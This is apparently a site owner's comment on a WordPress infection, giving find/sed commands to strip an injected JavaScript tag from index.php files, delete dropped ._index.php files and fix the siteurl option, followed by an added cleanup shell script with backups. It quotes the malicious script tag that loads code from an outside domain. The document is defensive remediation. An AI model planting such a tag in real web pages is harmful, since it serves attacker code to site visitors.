Hello.
My website has been attacked this night too.
All your index.php files have been infected by an injection of a JavaScript call: <script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>
1 – You have to remove this line in each index file by using find & sed
find . -name "index.php" -exec sed -i "s#<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>##g" {} +
2 – Remove extra index files created by the script
find . -name "._index.php" -print -delete
3 – The script has changed the siteurl in the database; you have to fix it.
In the table wp_options, where option_name is siteurl, replace the option_value with the correct URL.
Glad to help
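
An added example, not part of the comment above: a shell script for steps 1 and 2 that lists what is affected before changing anything and keeps a backup of every file it edits. The marker URL is taken from the comment; the function names, the `--clean` argument and the choice to match either quote style and any `v=` value are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit first, then clean (steps 1 and 2 of the comment above).
# MARKER is the injected script URL from the comment; all names are assumptions.
MARKER='ws.stivenfernando.com/stm'

# Step 1 (audit): index.php files under $1 that contain the injected URL.
list_infected() {
    find "$1" -type f -name 'index.php' -exec grep -lF "$MARKER" {} +
}

# Step 2 (audit): extra ._index.php files created by the attack.
list_dropped() {
    find "$1" -type f -name '._index.php'
}

# Remove the injected <script> tag from each infected file, leaving a
# .bak copy of the original for later inspection, then delete the
# ._index.php files. The pattern accepts ' or " and any v= value.
# Assumes paths without newlines.
clean_tree() {
    root=$1
    list_infected "$root" | while IFS= read -r f; do
        sed -i.bak "s#<script type=['\"]text/javascript['\"] src=['\"]https://ws\.stivenfernando\.com/stm[^'\"]*['\"]></script>##g" "$f"
    done
    find "$root" -type f -name '._index.php' -delete
}

# Usage: sh clean.sh /path/to/wordpress          (report only)
#        sh clean.sh /path/to/wordpress --clean  (report, then clean)
if [ "$#" -gt 0 ]; then
    echo "Infected index.php files:"
    list_infected "$1"
    echo "Dropped ._index.php files:"
    list_dropped "$1"
    if [ "${2:-}" = "--clean" ]; then
        clean_tree "$1"
        echo "Remaining infected files after cleaning:"
        list_infected "$1"
    fi
fi
```

Step 3, the siteurl value in wp_options, is a database change and is not covered by this script.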